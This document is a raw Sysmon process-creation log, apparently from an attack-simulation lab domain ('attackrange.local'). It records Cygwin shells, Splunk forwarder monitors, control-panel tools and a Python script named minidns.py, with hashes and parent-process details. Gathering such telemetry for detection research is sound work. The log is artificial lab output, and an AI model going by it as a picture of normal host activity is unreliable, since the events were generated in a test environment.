15:02:03.017{A8622C2F-556B-6078-140D-00000000AE01}3008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000061138Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:02.998{A8622C2F-556A-6078-130D-00000000AE01}5312C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-556A-6078-120D-00000000AE01}6836C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000061123Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:02.981{A8622C2F-556A-6078-120D-00000000AE01}6836C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-556A-6078-0F0D-00000000AE01}6240C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000061109Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:02.886{A8622C2F-556A-6078-100D-00000000AE01}6456C:\cygwin64\bin\cygwin-console-helper.exe-----"\\?\C:\cygwin64\bin\cygwin-console-helper.exe" 0x418 
0x41CC:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8BFA89E9045A949619C8511955C39779,SHA256=7B4BB51FC16D1B4F44D2A73D9939C177008D5DB4E9EECCA42A9D01D90D7C8CEF,IMPHASH=DC4FCFEBC59A5F04DB2C6D852B01071C{A8622C2F-556A-6078-0F0D-00000000AE01}6240C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000061072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:02:02.716{A8622C2F-556A-6078-0F0D-00000000AE01}6240C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000060774Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:22.711{A8622C2F-5542-6078-0C0D-00000000AE01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060767Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:01:22.829{A8622C2F-5542-6078-0D0D-00000000AE01}3420C:\Windows\System32\SystemPropertiesAdvanced.exe10.0.14393.0 (rs1_release.160715-1616)Advanced System SettingsMicrosoft® Windows® Operating SystemMicrosoft CorporationSystemPropertiesAdvanced.EXE"C:\Windows\system32\systempropertiesadvanced.exe" C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=167BD51C53D3972B0F7EFB1ABA6FB207,SHA256=0AA8C07A382405ED6C58EED6656592E3319811B38A819FA6530C8EA92D3BE313,IMPHASH=F645D3540F34B60C2EDF081815969E40{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000060715Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:20.892{A8622C2F-5540-6078-090D-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:20.448{A8622C2F-5540-6078-080D-00000000AE01}5828C:\Windows\SysWOW64\dllhost.exe10.0.14393.0 (rs1_release.160715-1616)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe 
/Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=6046950FC9CA5B7A7E084C189658DACB,SHA256=5137C324038AB2E8EAB4F98A20BEE9F121346D62E4D907CA1E4A860F4C54EAE8,IMPHASH=EC90A0D780E0DD23BA7910ABD6BF7E32{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x800000000000000060686Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:20.420{A8622C2F-5540-6078-070D-00000000AE01}928C:\Windows\System32\control.exe10.0.14393.0 (rs1_release.160715-1616)Windows Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationCONTROL.EXE"C:\Windows\system32\control.exe" SYSTEMC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=924219B426830FF7476AF7D22AE91DE1,SHA256=CB089C50698BEE280244437BCAF56D3955402A582E5E928DBC8812A5D9C0EF4D,IMPHASH=EA468570E9A3DEDC296C3D5DECEA9AA6{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000060677Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:20.220{A8622C2F-5540-6078-060D-00000000AE01}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:01:19.547{A8622C2F-553F-6078-050D-00000000AE01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060647Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:17.594{A8622C2F-553D-6078-040D-00000000AE01}2104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:16.939{A8622C2F-553C-6078-030D-00000000AE01}1476C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060627Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:16.270{A8622C2F-553C-6078-020D-00000000AE01}3904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060591Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:01:06.271{A8622C2F-5532-6078-010D-00000000AE01}6836C:\cygwin64\bin\which.exe-----"C:\cygwin64\bin\which.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=1EF23A8281E59922767204E07E30FE0A,SHA256=3449172DD849D69808291F5B2E51C96CEBDCCE47C5557B6DE1C44F48A8AAE1B0,IMPHASH=798C2BA85391CE6B62F71807EB04AD4A{A8622C2F-5532-6078-000D-00000000AE01}5516C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060573Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:01:06.260{A8622C2F-5532-6078-000D-00000000AE01}5516C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060365Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:22.852{A8622C2F-5506-6078-FD0C-00000000AE01}5276C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:20.792{A8622C2F-5504-6078-FC0C-00000000AE01}5496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000060338Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:20.203{A8622C2F-5504-6078-FB0C-00000000AE01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060329Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:19.536{A8622C2F-5503-6078-FA0C-00000000AE01}932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060313Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:17.435{A8622C2F-5501-6078-F90C-00000000AE01}6020C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060304Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:16.923{A8622C2F-5500-6078-F80C-00000000AE01}6492C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000060291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:16.256{A8622C2F-5500-6078-F70C-00000000AE01}5628C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000060277Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:15.932{A8622C2F-54FF-6078-F60C-00000000AE01}2112C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" --versionC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-54FF-6078-F50C-00000000AE01}4596C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060258Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:15.922{A8622C2F-54FF-6078-F50C-00000000AE01}4596C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060228Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:00:08.467{A8622C2F-54F8-6078-F40C-00000000AE01}2952C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-54F8-6078-F30C-00000000AE01}4940C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060210Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:00:08.457{A8622C2F-54F8-6078-F30C-00000000AE01}4940C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060159Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:54.907{A8622C2F-54EA-6078-F20C-00000000AE01}4268C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program Files\Python38\python.exe" c:tempminidns.pyC:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-54EA-6078-F10C-00000000AE01}5008C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060141Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:54.896{A8622C2F-54EA-6078-F10C-00000000AE01}5008C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:59:41.007{A8622C2F-54DD-6078-F00C-00000000AE01}3500C:\cygwin64\bin\dir.exe-----"C:\cygwin64\bin\dir.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CB1A7D2EE275FCA2B1FCC408145D8D97,SHA256=84A649A70A36BDF0F8ADFA940DBCCDB2DD1FCD2FFA9AE4F370DBECC9BAAF940B,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-54DC-6078-EF0C-00000000AE01}6112C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060070Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:40.997{A8622C2F-54DC-6078-EF0C-00000000AE01}6112C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Python27\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000060012Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:29.377{A8622C2F-54D1-6078-EE0C-00000000AE01}6460C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059954Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:22.840{A8622C2F-54CA-6078-ED0C-00000000AE01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059940Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:20.868{A8622C2F-54C8-6078-EC0C-00000000AE01}5928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059929Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:20.195{A8622C2F-54C8-6078-EB0C-00000000AE01}5148C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059907Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
